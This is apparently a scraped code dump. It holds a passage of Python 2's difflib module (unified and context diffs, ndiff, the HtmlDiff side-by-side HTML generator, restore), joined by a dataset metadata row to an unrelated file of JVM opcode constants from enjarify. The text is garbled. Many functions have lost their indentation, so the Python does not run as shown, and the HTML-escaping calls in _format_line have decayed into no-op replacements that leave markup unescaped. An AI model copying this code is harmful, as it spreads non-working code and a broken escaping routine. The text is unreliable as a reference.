            todate = '\t{}'.format(tofiledate) if tofiledate else ''
            yield '--- {}{}{}'.format(fromfile, fromdate, lineterm)
            yield '+++ {}{}{}'.format(tofile, todate, lineterm)
        first, last = group[0], group[-1]
        yield '@@ -{} +{} @@{}'.format(
            _format_range_unified(first[1], last[2]),
            _format_range_unified(first[3], last[4]), lineterm)
        for tag, i1, i2, j1, j2 in group:
            if tag == 'equal':
                for line in a[i1:i2]:
                    yield ' ' + line
            else:
                # replace/delete emit '-' lines, replace/insert emit '+'
                if tag != 'insert':
                    for line in a[i1:i2]:
                        yield '-' + line
                if tag != 'delete':
                    for line in b[j1:j2]:
                        yield '+' + line
########################################################################
### Context Diff
########################################################################
def _format_range_context(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if not length:
beginning -= 1 # empty ranges begin at line just before the range
if length <= 1:
return '{}'.format(beginning)
return '{},{}'.format(beginning, beginning + length - 1)
# See http://www.unix.org/single_unix_specification/
def context_diff(a, b, fromfile='', tofile='',
                 fromfiledate='', tofiledate='', n=3, lineterm='\n'):
    r"""
    Compare two sequences of lines; generate the delta as a context diff.

    Context diffs show changed lines plus `n` lines of surrounding context
    (default 3).  The control lines (those with *** or ---) carry a trailing
    `lineterm`, so inputs produced by file.readlines() yield diffs suitable
    for file.writelines(); pass lineterm='' for inputs without trailing
    newlines to get a uniformly newline-free result.

    The header may carry filenames and modification times supplied via
    'fromfile', 'tofile', 'fromfiledate' and 'tofiledate' (conventionally in
    ISO 8601 format); unspecified fields default to blanks.

    Example:
    >>> print ''.join(context_diff('one\ntwo\nthree\nfour\n'.splitlines(1),
    ...       'zero\none\ntree\nfour\n'.splitlines(1), 'Original', 'Current')),
    *** Original
    --- Current
    ***************
    *** 1,4 ****
      one
    ! two
    ! three
      four
    --- 1,4 ----
    + zero
      one
    ! tree
      four
    """
    # two-character line prefixes, as mandated by the context diff format
    prefix = dict(insert='+ ', delete='- ', replace='! ', equal='  ')
    header_emitted = False
    for group in SequenceMatcher(None, a, b).get_grouped_opcodes(n):
        if not header_emitted:
            header_emitted = True
            fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
            todate = '\t{}'.format(tofiledate) if tofiledate else ''
            yield '*** {}{}{}'.format(fromfile, fromdate, lineterm)
            yield '--- {}{}{}'.format(tofile, todate, lineterm)
        first, last = group[0], group[-1]
        yield '***************' + lineterm
        group_tags = set(op[0] for op in group)
        yield '*** {} ****{}'.format(
            _format_range_context(first[1], last[2]), lineterm)
        # the "from" half is only printed when something was removed/changed
        if group_tags.intersection(['replace', 'delete']):
            for tag, i1, i2, _, _ in group:
                if tag != 'insert':
                    for line in a[i1:i2]:
                        yield prefix[tag] + line
        yield '--- {} ----{}'.format(
            _format_range_context(first[3], last[4]), lineterm)
        # the "to" half is only printed when something was added/changed
        if group_tags.intersection(['replace', 'insert']):
            for tag, _, _, j1, j2 in group:
                if tag != 'delete':
                    for line in b[j1:j2]:
                        yield prefix[tag] + line
def ndiff(a, b, linejunk=None, charjunk=IS_CHARACTER_JUNK):
r"""
Compare `a` and `b` (lists of strings); return a `Differ`-style delta.
Optional keyword parameters `linejunk` and `charjunk` are for filter
functions (or None):
- linejunk: A function that should accept a single string argument, and
return true iff the string is junk. The default is None, and is
recommended; as of Python 2.3, an adaptive notion of "noise" lines is
used that does a good job on its own.
- charjunk: A function that should accept a string of length 1. The
default is module-level function IS_CHARACTER_JUNK, which filters out
whitespace characters (a blank or tab; note: bad idea to include newline
in this!).
Tools/scripts/ndiff.py is a command-line front-end to this function.
Example:
>>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
... 'ore\ntree\nemu\n'.splitlines(1))
>>> print ''.join(diff),
- one
? ^
+ ore
? ^
- two
- three
? -
+ tree
+ emu
"""
return Differ(linejunk, charjunk).compare(a, b)
def _mdiff(fromlines, tolines, context=None, linejunk=None,
charjunk=IS_CHARACTER_JUNK):
r"""Returns generator yielding marked up from/to side by side differences.
Arguments:
fromlines -- list of text lines to compared to tolines
tolines -- list of text lines to be compared to fromlines
context -- number of context lines to display on each side of difference,
if None, all from/to text lines will be generated.
linejunk -- passed on to ndiff (see ndiff documentation)
charjunk -- passed on to ndiff (see ndiff documentation)
This function returns an iterator which returns a tuple:
(from line tuple, to line tuple, boolean flag)
from/to line tuple -- (line num, line text)
line num -- integer or None (to indicate a context separation)
line text -- original line text with following markers inserted:
'\0+' -- marks start of added text
'\0-' -- marks start of deleted text
'\0^' -- marks start of changed text
'\1' -- marks end of added/deleted/changed text
boolean flag -- None indicates context separation, True indicates
either "from" or "to" line contains a change, otherwise False.
This function/iterator was originally developed to generate side by side
file difference for making HTML pages (see HtmlDiff class for example
usage).
Note, this function utilizes the ndiff function to generate the side by
side difference markup. Optional ndiff arguments may be passed to this
function and they in turn will be passed to ndiff.
"""
import re
# regular expression for finding intraline change indices
change_re = re.compile('(\++|\-+|\^+)')
# create the difference iterator to generate the differences
diff_lines_iterator = ndiff(fromlines,tolines,linejunk,charjunk)
def _make_line(lines, format_key, side, num_lines=[0,0]):
"""Returns line of text with user's change markup and line formatting.
lines -- list of lines from the ndiff generator to produce a line of
text from. When producing the line of text to return, the
lines used are removed from this list.
format_key -- '+' return first line in list with "add" markup around
the entire line.
'-' return first line in list with "delete" markup around
the entire line.
'?' return first line in list with add/delete/change
intraline markup (indices obtained from second line)
None return first line in list with no markup
side -- indice into the num_lines list (0=from,1=to)
num_lines -- from/to current line number. This is NOT intended to be a
passed parameter. It is present as a keyword argument to
maintain memory of the current line numbers between calls
of this function.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
num_lines[side] += 1
# Handle case where no user markup is to be added, just return line of
# text with user's line format to allow for usage of the line number.
if format_key is None:
return (num_lines[side],lines.pop(0)[2:])
# Handle case of intraline changes
if format_key == '?':
text, markers = lines.pop(0), lines.pop(0)
# find intraline changes (store change type and indices in tuples)
sub_info = []
def record_sub_info(match_object,sub_info=sub_info):
sub_info.append([match_object.group(1)[0],match_object.span()])
return match_object.group(1)
change_re.sub(record_sub_info,markers)
# process each tuple inserting our special marks that won't be
# noticed by an xml/html escaper.
for key,(begin,end) in sub_info[::-1]:
text = text[0:begin]+'\0'+key+text[begin:end]+'\1'+text[end:]
text = text[2:]
# Handle case of add/delete entire line
else:
text = lines.pop(0)[2:]
# if line of text is just a newline, insert a space so there is
# something for the user to highlight and see.
if not text:
text = ' '
# insert marks that won't be noticed by an xml/html escaper.
text = '\0' + format_key + text + '\1'
# Return line of text, first allow user's line formatter to do its
# thing (such as adding the line number) then replace the special
# marks with what the user's change markup.
return (num_lines[side],text)
def _line_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from a
differencing iterator, processes them and yields them. When it can
it yields both a "from" and a "to" line, otherwise it will yield one
or the other. In addition to yielding the lines of from/to text, a
boolean flag is yielded to indicate if the text line(s) have
differences in them.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
lines = []
num_blanks_pending, num_blanks_to_yield = 0, 0
while True:
# Load up next 4 lines so we can look ahead, create strings which
# are a concatenation of the first character of each of the 4 lines
# so we can do some very readable comparisons.
while len(lines) < 4:
try:
lines.append(diff_lines_iterator.next())
except StopIteration:
lines.append('X')
s = ''.join([line[0] for line in lines])
if s.startswith('X'):
# When no more lines, pump out any remaining blank lines so the
# corresponding add/delete lines get a matching blank line so
# all line pairs get yielded at the next level.
num_blanks_to_yield = num_blanks_pending
elif s.startswith('-?+?'):
# simple intraline change
yield _make_line(lines,'?',0), _make_line(lines,'?',1), True
continue
elif s.startswith('--++'):
# in delete block, add block coming: we do NOT want to get
# caught up on blank lines yet, just process the delete line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith(('--?+', '--+', '- ')):
# in delete block and see an intraline change or unchanged line
# coming: yield the delete line and then blanks
from_line,to_line = _make_line(lines,'-',0), None
num_blanks_to_yield,num_blanks_pending = num_blanks_pending-1,0
elif s.startswith('-+?'):
# intraline change
yield _make_line(lines,None,0), _make_line(lines,'?',1), True
continue
elif s.startswith('-?+'):
# intraline change
yield _make_line(lines,'?',0), _make_line(lines,None,1), True
continue
elif s.startswith('-'):
# delete FROM line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith('+--'):
# in add block, delete block coming: we do NOT want to get
# caught up on blank lines yet, just process the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(('+ ', '+-')):
# will be leaving an add block: yield blanks then add line
from_line, to_line = None, _make_line(lines,'+',1)
num_blanks_to_yield,num_blanks_pending = num_blanks_pending+1,0
elif s.startswith('+'):
# inside an add block, yield the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(' '):
# unchanged text, yield it to both sides
yield _make_line(lines[:],None,0),_make_line(lines,None,1),False
continue
# Catch up on the blank lines so when we yield the next from/to
# pair, they are lined up.
while(num_blanks_to_yield < 0):
num_blanks_to_yield += 1
yield None,('','\n'),True
while(num_blanks_to_yield > 0):
num_blanks_to_yield -= 1
yield ('','\n'),None,True
if s.startswith('X'):
raise StopIteration
else:
yield from_line,to_line,True
def _line_pair_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from the line
iterator. Its difference from that iterator is that this function
always yields a pair of from/to text lines (with the change
indication). If necessary it will collect single from/to lines
until it has a matching pair from/to pair to yield.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
line_iterator = _line_iterator()
fromlines,tolines=[],[]
while True:
# Collecting lines of text until we have a from/to pair
while (len(fromlines)==0 or len(tolines)==0):
from_line, to_line, found_diff =line_iterator.next()
if from_line is not None:
fromlines.append((from_line,found_diff))
if to_line is not None:
tolines.append((to_line,found_diff))
# Once we have a pair, remove them from the collection and yield it
from_line, fromDiff = fromlines.pop(0)
to_line, to_diff = tolines.pop(0)
yield (from_line,to_line,fromDiff or to_diff)
# Handle case where user does not want context differencing, just yield
# them up without doing anything else with them.
line_pair_iterator = _line_pair_iterator()
if context is None:
while True:
yield line_pair_iterator.next()
# Handle case where user wants context differencing. We must do some
# storage of lines until we know for sure that they are to be yielded.
else:
context += 1
lines_to_write = 0
while True:
# Store lines up until we find a difference, note use of a
# circular queue because we only need to keep around what
# we need for context.
index, contextLines = 0, [None]*(context)
found_diff = False
while(found_diff is False):
from_line, to_line, found_diff = line_pair_iterator.next()
i = index % context
contextLines[i] = (from_line, to_line, found_diff)
index += 1
# Yield lines that we have collected so far, but first yield
# the user's separator.
if index > context:
yield None, None, None
lines_to_write = context
else:
lines_to_write = index
index = 0
while(lines_to_write):
i = index % context
index += 1
yield contextLines[i]
lines_to_write -= 1
# Now yield the context lines after the change
lines_to_write = context-1
while(lines_to_write):
from_line, to_line, found_diff = line_pair_iterator.next()
# If another change within the context, extend the context
if found_diff:
lines_to_write = context-1
else:
lines_to_write -= 1
yield from_line, to_line, found_diff
# HTML page scaffold used by HtmlDiff.make_file(); filled in via %-formatting
# with the keys 'styles', 'table' and 'legend'.
_file_template = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1" />
<title></title>
<style type="text/css">%(styles)s
</style>
</head>
<body>
%(table)s%(legend)s
</body>
</html>"""

# Default CSS for the diff table; the class names here are emitted by
# HtmlDiff's markup helpers.
_styles = """
table.diff {font-family:Courier; border:medium;}
.diff_header {background-color:#e0e0e0}
td.diff_header {text-align:right}
.diff_next {background-color:#c0c0c0}
.diff_add {background-color:#aaffaa}
.diff_chg {background-color:#ffff77}
.diff_sub {background-color:#ffaaaa}"""

# Skeleton of the side-by-side table produced by HtmlDiff.make_table();
# filled in via %-formatting with 'prefix', 'header_row' and 'data_rows'.
_table_template = """
<table class="diff" id="difflib_chg_%(prefix)s_top"
cellspacing="0" cellpadding="0" rules="groups" >
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
%(header_row)s
<tbody>
%(data_rows)s </tbody>
</table>"""

# Static legend table explaining the colors and the f/n/t navigation links.
_legend = """
<table class="diff" summary="Legends">
<tr> <th colspan="2"> Legends </th> </tr>
<tr> <td> <table border="" summary="Colors">
<tr><th> Colors </th> </tr>
<tr><td class="diff_add"> Added </td></tr>
<tr><td class="diff_chg">Changed</td> </tr>
<tr><td class="diff_sub">Deleted</td> </tr>
</table></td>
<td> <table border="" summary="Links">
<tr><th colspan="2"> Links </th> </tr>
<tr><td>(f)irst change</td> </tr>
<tr><td>(n)ext change</td> </tr>
<tr><td>(t)op</td> </tr>
</table></td> </tr>
</table>"""
class HtmlDiff(object):
"""For producing HTML side by side comparison with change highlights.
This class can be used to create an HTML table (or a complete HTML file
containing the table) showing a side by side, line by line comparison
of text with inter-line and intra-line change highlights. The table can
be generated in either full or contextual difference mode.
The following methods are provided for HTML generation:
make_table -- generates HTML for a single side by side table
make_file -- generates complete HTML file with a single side by side table
See tools/scripts/diff.py for an example usage of this class.
"""
_file_template = _file_template
_styles = _styles
_table_template = _table_template
_legend = _legend
_default_prefix = 0
def __init__(self,tabsize=8,wrapcolumn=None,linejunk=None,
             charjunk=IS_CHARACTER_JUNK):
    """HtmlDiff instance initializer

    Arguments:
    tabsize -- tab stop spacing, defaults to 8.
    wrapcolumn -- column number where lines are broken and wrapped,
        defaults to None where lines are not wrapped.
    linejunk,charjunk -- keyword arguments passed into ndiff() (used by
        HtmlDiff() to generate the side by side HTML differences).  See
        ndiff() documentation for argument default values and descriptions.
    """
    # store the options; they are read later by make_table() and the
    # private helpers (_tab_newline_replace, _split_line, the ndiff call)
    self._tabsize = tabsize
    self._wrapcolumn = wrapcolumn
    self._linejunk = linejunk
    self._charjunk = charjunk
def make_file(self,fromlines,tolines,fromdesc='',todesc='',context=False,
              numlines=5):
    """Returns HTML file of side by side comparison with change highlights

    Arguments:
    fromlines -- list of "from" lines
    tolines -- list of "to" lines
    fromdesc -- "from" file column header string
    todesc -- "to" file column header string
    context -- set to True for contextual differences (defaults to False
        which shows full differences).
    numlines -- number of context lines.  When context is set True,
        controls number of lines displayed before and after the change.
        When context is False, controls the number of lines to place
        the "next" link anchors before the next change (so click of
        "next" link jumps to just before the change).
    """
    # build the comparison table first, then drop it into the page scaffold
    table = self.make_table(fromlines, tolines, fromdesc, todesc,
                            context=context, numlines=numlines)
    return self._file_template % dict(styles=self._styles,
                                      legend=self._legend,
                                      table=table)
def _tab_newline_replace(self,fromlines,tolines):
"""Returns from/to line lists with tabs expanded and newlines removed.
Instead of tab characters being replaced by the number of spaces
needed to fill in to the next tab stop, this function will fill
the space with tab characters. This is done so that the difference
algorithms can identify changes in a file when tabs are replaced by
spaces and vice versa. At the end of the HTML generation, the tab
characters will be replaced with a nonbreakable space.
"""
def expand_tabs(line):
# hide real spaces
line = line.replace(' ','\0')
# expand tabs into spaces
line = line.expandtabs(self._tabsize)
# replace spaces from expanded tabs back into tab characters
# (we'll replace them with markup after we do differencing)
line = line.replace(' ','\t')
return line.replace('\0',' ').rstrip('\n')
fromlines = [expand_tabs(line) for line in fromlines]
tolines = [expand_tabs(line) for line in tolines]
return fromlines,tolines
def _split_line(self,data_list,line_num,text):
    """Builds list of text lines by splitting text lines at wrap point

    This function will determine if the input text line needs to be
    wrapped (split) into separate lines.  If so, the first wrap point
    will be determined and the first line appended to the output
    text line list.  This function is used recursively to handle
    the second part of the split line to further split it.
    """
    # if blank line or context separator, just add it to the output list
    if not line_num:
        data_list.append((line_num,text))
        return

    # if line text doesn't need wrapping, just add it to the output list
    size = len(text)
    max = self._wrapcolumn
    # each '\0' marker is accompanied by a key character and a closing
    # '\1' (3 zero-width characters per marker), so a line also fits when
    # it is short enough once those are discounted
    if (size <= max) or ((size -(text.count('\0')*3)) <= max):
        data_list.append((line_num,text))
        return

    # scan text looking for the wrap point, keeping track if the wrap
    # point is inside markers
    i = 0
    n = 0
    mark = ''
    while n < max and i < size:
        if text[i] == '\0':
            i += 1
            mark = text[i]   # remember the active markup key ('+','-','^')
            i += 1
        elif text[i] == '\1':
            i += 1
            mark = ''
        else:
            # only visible characters advance the display column
            i += 1
            n += 1

    # wrap point is inside text, break it up into separate lines
    line1 = text[:i]
    line2 = text[i:]

    # if wrap point is inside markers, place end marker at end of first
    # line and start marker at beginning of second line because each
    # line will have its own table tag markup around it.
    if mark:
        line1 = line1 + '\1'
        line2 = '\0' + mark + line2

    # tack on first line onto the output list
    data_list.append((line_num,line1))

    # use this routine again to wrap the remaining text
    self._split_line(data_list,'>',line2)
def _line_wrapper(self,diffs):
"""Returns iterator that splits (wraps) mdiff text lines"""
# pull from/to data and flags from mdiff iterator
for fromdata,todata,flag in diffs:
# check for context separators and pass them through
if flag is None:
yield fromdata,todata,flag
continue
(fromline,fromtext),(toline,totext) = fromdata,todata
# for each from/to line split it at the wrap column to form
# list of text lines.
fromlist,tolist = [],[]
self._split_line(fromlist,fromline,fromtext)
self._split_line(tolist,toline,totext)
# yield from/to line in pairs inserting blank lines as
# necessary when one side has more wrapped lines
while fromlist or tolist:
if fromlist:
fromdata = fromlist.pop(0)
else:
fromdata = ('',' ')
if tolist:
todata = tolist.pop(0)
else:
todata = ('',' ')
yield fromdata,todata,flag
def _collect_lines(self,diffs):
"""Collects mdiff output into separate lists
Before storing the mdiff from/to data into a list, it is converted
into a single line of text with HTML markup.
"""
fromlist,tolist,flaglist = [],[],[]
# pull from/to data and flags from mdiff style iterator
for fromdata,todata,flag in diffs:
try:
# store HTML markup of the lines into the lists
fromlist.append(self._format_line(0,flag,*fromdata))
tolist.append(self._format_line(1,flag,*todata))
except TypeError:
# exceptions occur for lines where context separators go
fromlist.append(None)
tolist.append(None)
flaglist.append(flag)
return fromlist,tolist,flaglist
def _format_line(self,side,flag,linenum,text):
"""Returns HTML markup of "from" / "to" text lines
side -- 0 or 1 indicating "from" or "to" text
flag -- indicates if difference on line
linenum -- line number (used for line number column)
text -- line text to be marked up
"""
try:
linenum = '%d' % linenum
id = ' id="%s%s"' % (self._prefix[side],linenum)
except TypeError:
# handle blank lines where linenum is '>' or ''
id = ''
# replace those things that would get confused with HTML symbols
text=text.replace("&","&").replace(">",">").replace("<","<")
# make space non-breakable so they don't get compressed or line wrapped
text = text.replace(' ',' ').rstrip()
return '<td class="diff_header"%s>%s</td><td nowrap="nowrap">%s</td>' \
% (id,linenum,text)
def _make_prefix(self):
"""Create unique anchor prefixes"""
# Generate a unique anchor prefix so multiple tables
# can exist on the same HTML page without conflicts.
fromprefix = "from%d_" % HtmlDiff._default_prefix
toprefix = "to%d_" % HtmlDiff._default_prefix
HtmlDiff._default_prefix += 1
# store prefixes so line format method has access
self._prefix = [fromprefix,toprefix]
def _convert_flags(self,fromlist,tolist,flaglist,context,numlines):
"""Makes list of "next" links"""
# all anchor names will be generated using the unique "to" prefix
toprefix = self._prefix[1]
# process change flags, generating middle column of next anchors/links
next_id = ['']*len(flaglist)
next_href = ['']*len(flaglist)
num_chg, in_change = 0, False
last = 0
for i,flag in enumerate(flaglist):
if flag:
if not in_change:
in_change = True
last = i
# at the beginning of a change, drop an anchor a few lines
# (the context lines) before the change for the previous
# link
i = max([0,i-numlines])
next_id[i] = ' id="difflib_chg_%s_%d"' % (toprefix,num_chg)
# at the beginning of a change, drop a link to the next
# change
num_chg += 1
next_href[last] = '<a href="#difflib_chg_%s_%d">n</a>' % (
toprefix,num_chg)
else:
in_change = False
# check for cases where there is no content to avoid exceptions
if not flaglist:
flaglist = [False]
next_id = ['']
next_href = ['']
last = 0
if context:
fromlist = ['<td></td><td> No Differences Found </td>']
tolist = fromlist
else:
fromlist = tolist = ['<td></td><td> Empty File </td>']
# if not a change on first line, drop a link
if not flaglist[0]:
next_href[0] = '<a href="#difflib_chg_%s_0">f</a>' % toprefix
# redo the last link to link to the top
next_href[last] = '<a href="#difflib_chg_%s_top">t</a>' % (toprefix)
return fromlist,tolist,flaglist,next_href,next_id
def make_table(self,fromlines,tolines,fromdesc='',todesc='',context=False,
               numlines=5):
    """Returns HTML table of side by side comparison with change highlights

    Arguments:
    fromlines -- list of "from" lines
    tolines -- list of "to" lines
    fromdesc -- "from" file column header string
    todesc -- "to" file column header string
    context -- set to True for contextual differences (defaults to False
        which shows full differences).
    numlines -- number of context lines.  When context is set True,
        controls number of lines displayed before and after the change.
        When context is False, controls the number of lines to place
        the "next" link anchors before the next change (so click of
        "next" link jumps to just before the change).
    """
    # make unique anchor prefixes so that multiple tables may exist
    # on the same page without conflict.
    self._make_prefix()
    # change tabs to spaces before it gets more difficult after we insert
    # markup
    fromlines,tolines = self._tab_newline_replace(fromlines,tolines)
    # create diffs iterator which generates side by side from/to data
    if context:
        context_lines = numlines
    else:
        context_lines = None
    diffs = _mdiff(fromlines,tolines,context_lines,linejunk=self._linejunk,
                   charjunk=self._charjunk)
    # set up iterator to wrap lines that exceed desired width
    if self._wrapcolumn:
        diffs = self._line_wrapper(diffs)
    # collect up from/to lines and flags into lists (also format the lines)
    fromlist,tolist,flaglist = self._collect_lines(diffs)
    # process change flags, generating middle column of next anchors/links
    fromlist,tolist,flaglist,next_href,next_id = self._convert_flags(
        fromlist,tolist,flaglist,context,numlines)
    s = []
    # Row template: next-anchor cell, "from" cells, next-link cell, "to" cells.
    fmt = ' <tr><td class="diff_next"%s>%s</td>%s' + \
          '<td class="diff_next">%s</td>%s</tr>\n'
    for i in range(len(flaglist)):
        if flaglist[i] is None:
            # mdiff yields None on separator lines skip the bogus ones
            # generated for the first line
            if i > 0:
                s.append(' </tbody> \n <tbody>\n')
        else:
            s.append( fmt % (next_id[i],next_href[i],fromlist[i],
                             next_href[i],tolist[i]))
    if fromdesc or todesc:
        header_row = '<thead><tr>%s%s%s%s</tr></thead>' % (
            '<th class="diff_next"><br /></th>',
            '<th colspan="2" class="diff_header">%s</th>' % fromdesc,
            '<th class="diff_next"><br /></th>',
            '<th colspan="2" class="diff_header">%s</th>' % todesc)
    else:
        header_row = ''
    table = self._table_template % dict(
        data_rows=''.join(s),
        header_row=header_row,
        prefix=self._prefix[1])
    # Replace the NUL-byte change markers emitted by _mdiff ('\0+', '\0-',
    # '\0^' open a region, '\1' closes it) with highlighting spans.
    return table.replace('\0+','<span class="diff_add">'). \
                 replace('\0-','<span class="diff_sub">'). \
                 replace('\0^','<span class="diff_chg">'). \
                 replace('\1','</span>'). \
                 replace('\t',' ')
del re
def restore(delta, which):
    r"""
    Generate one of the two sequences that generated a delta.

    Given a `delta` produced by `Differ.compare()` or `ndiff()`, extract
    lines originating from file 1 or 2 (parameter `which`), stripping off line
    prefixes.

    Examples:

    >>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
    ...              'ore\ntree\nemu\n'.splitlines(1))
    >>> diff = list(diff)
    >>> print ''.join(restore(diff, 1)),
    one
    two
    three
    >>> print ''.join(restore(diff, 2)),
    ore
    tree
    emu
    """
    try:
        tag = {1: "- ", 2: "+ "}[int(which)]
    except KeyError:
        # Use call syntax (valid on both Python 2 and 3) instead of the
        # Python-2-only ``raise ValueError, ...`` statement form.
        raise ValueError('unknown delta choice (must be 1 or 2): %r'
                         % which)
    # ndiff marks lines common to both sequences with a two-space prefix;
    # the previous single-space prefix never matched, silently dropping
    # every common line from the restored sequence.
    prefixes = ("  ", tag)
    for line in delta:
        if line[:2] in prefixes:
            yield line[2:]
def _test():
import doctest, difflib
return doctest.testmod(difflib)
if __name__ == "__main__":
_test()
| mit |
EasonYi/enjarify | enjarify/jvm/jvmops.py | 35 | 3479 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# JVM bytecode opcode numbers (see the JVM specification, chapter 6,
# "The Java Virtual Machine Instruction Set"). Names match the spec
# mnemonics, upper-cased.

# --- Constants and literal pushes (0x00-0x14) ---
NOP = 0x00
ACONST_NULL = 0x01
ICONST_M1 = 0x02
ICONST_0 = 0x03
ICONST_1 = 0x04
ICONST_2 = 0x05
ICONST_3 = 0x06
ICONST_4 = 0x07
ICONST_5 = 0x08
LCONST_0 = 0x09
LCONST_1 = 0x0A
FCONST_0 = 0x0B
FCONST_1 = 0x0C
FCONST_2 = 0x0D
DCONST_0 = 0x0E
DCONST_1 = 0x0F
BIPUSH = 0x10
SIPUSH = 0x11
LDC = 0x12
LDC_W = 0x13
LDC2_W = 0x14

# --- Local variable loads (0x15-0x2D) ---
ILOAD = 0x15
LLOAD = 0x16
FLOAD = 0x17
DLOAD = 0x18
ALOAD = 0x19
ILOAD_0 = 0x1A
ILOAD_1 = 0x1B
ILOAD_2 = 0x1C
ILOAD_3 = 0x1D
LLOAD_0 = 0x1E
LLOAD_1 = 0x1F
LLOAD_2 = 0x20
LLOAD_3 = 0x21
FLOAD_0 = 0x22
FLOAD_1 = 0x23
FLOAD_2 = 0x24
FLOAD_3 = 0x25
DLOAD_0 = 0x26
DLOAD_1 = 0x27
DLOAD_2 = 0x28
DLOAD_3 = 0x29
ALOAD_0 = 0x2A
ALOAD_1 = 0x2B
ALOAD_2 = 0x2C
ALOAD_3 = 0x2D

# --- Array element loads (0x2E-0x35) ---
IALOAD = 0x2E
LALOAD = 0x2F
FALOAD = 0x30
DALOAD = 0x31
AALOAD = 0x32
BALOAD = 0x33
CALOAD = 0x34
SALOAD = 0x35

# --- Local variable stores (0x36-0x4E) ---
ISTORE = 0x36
LSTORE = 0x37
FSTORE = 0x38
DSTORE = 0x39
ASTORE = 0x3A
ISTORE_0 = 0x3B
ISTORE_1 = 0x3C
ISTORE_2 = 0x3D
ISTORE_3 = 0x3E
LSTORE_0 = 0x3F
LSTORE_1 = 0x40
LSTORE_2 = 0x41
LSTORE_3 = 0x42
FSTORE_0 = 0x43
FSTORE_1 = 0x44
FSTORE_2 = 0x45
FSTORE_3 = 0x46
DSTORE_0 = 0x47
DSTORE_1 = 0x48
DSTORE_2 = 0x49
DSTORE_3 = 0x4A
ASTORE_0 = 0x4B
ASTORE_1 = 0x4C
ASTORE_2 = 0x4D
ASTORE_3 = 0x4E

# --- Array element stores (0x4F-0x56) ---
IASTORE = 0x4F
LASTORE = 0x50
FASTORE = 0x51
DASTORE = 0x52
AASTORE = 0x53
BASTORE = 0x54
CASTORE = 0x55
SASTORE = 0x56

# --- Operand stack manipulation (0x57-0x5F) ---
POP = 0x57
POP2 = 0x58
DUP = 0x59
DUP_X1 = 0x5A
DUP_X2 = 0x5B
DUP2 = 0x5C
DUP2_X1 = 0x5D
DUP2_X2 = 0x5E
SWAP = 0x5F

# --- Arithmetic (0x60-0x77) ---
IADD = 0x60
LADD = 0x61
FADD = 0x62
DADD = 0x63
ISUB = 0x64
LSUB = 0x65
FSUB = 0x66
DSUB = 0x67
IMUL = 0x68
LMUL = 0x69
FMUL = 0x6A
DMUL = 0x6B
IDIV = 0x6C
LDIV = 0x6D
FDIV = 0x6E
DDIV = 0x6F
IREM = 0x70
LREM = 0x71
FREM = 0x72
DREM = 0x73
INEG = 0x74
LNEG = 0x75
FNEG = 0x76
DNEG = 0x77

# --- Shifts and bitwise logic (0x78-0x83), plus IINC (0x84) ---
ISHL = 0x78
LSHL = 0x79
ISHR = 0x7A
LSHR = 0x7B
IUSHR = 0x7C
LUSHR = 0x7D
IAND = 0x7E
LAND = 0x7F
IOR = 0x80
LOR = 0x81
IXOR = 0x82
LXOR = 0x83
IINC = 0x84

# --- Primitive type conversions (0x85-0x93) ---
I2L = 0x85
I2F = 0x86
I2D = 0x87
L2I = 0x88
L2F = 0x89
L2D = 0x8A
F2I = 0x8B
F2L = 0x8C
F2D = 0x8D
D2I = 0x8E
D2L = 0x8F
D2F = 0x90
I2B = 0x91
I2C = 0x92
I2S = 0x93

# --- Comparisons (0x94-0x98) ---
LCMP = 0x94
FCMPL = 0x95
FCMPG = 0x96
DCMPL = 0x97
DCMPG = 0x98

# --- Conditional and unconditional branches (0x99-0xA8) ---
IFEQ = 0x99
IFNE = 0x9A
IFLT = 0x9B
IFGE = 0x9C
IFGT = 0x9D
IFLE = 0x9E
IF_ICMPEQ = 0x9F
IF_ICMPNE = 0xA0
IF_ICMPLT = 0xA1
IF_ICMPGE = 0xA2
IF_ICMPGT = 0xA3
IF_ICMPLE = 0xA4
IF_ACMPEQ = 0xA5
IF_ACMPNE = 0xA6
GOTO = 0xA7
JSR = 0xA8

# --- Subroutine return and table dispatch (0xA9-0xAB) ---
RET = 0xA9
TABLESWITCH = 0xAA
LOOKUPSWITCH = 0xAB

# --- Method returns (0xAC-0xB1) ---
IRETURN = 0xAC
LRETURN = 0xAD
FRETURN = 0xAE
DRETURN = 0xAF
ARETURN = 0xB0
RETURN = 0xB1

# --- Field access (0xB2-0xB5) ---
GETSTATIC = 0xB2
PUTSTATIC = 0xB3
GETFIELD = 0xB4
PUTFIELD = 0xB5

# --- Method invocation (0xB6-0xBA) ---
INVOKEVIRTUAL = 0xB6
INVOKESPECIAL = 0xB7
INVOKESTATIC = 0xB8
INVOKEINTERFACE = 0xB9
INVOKEDYNAMIC = 0xBA

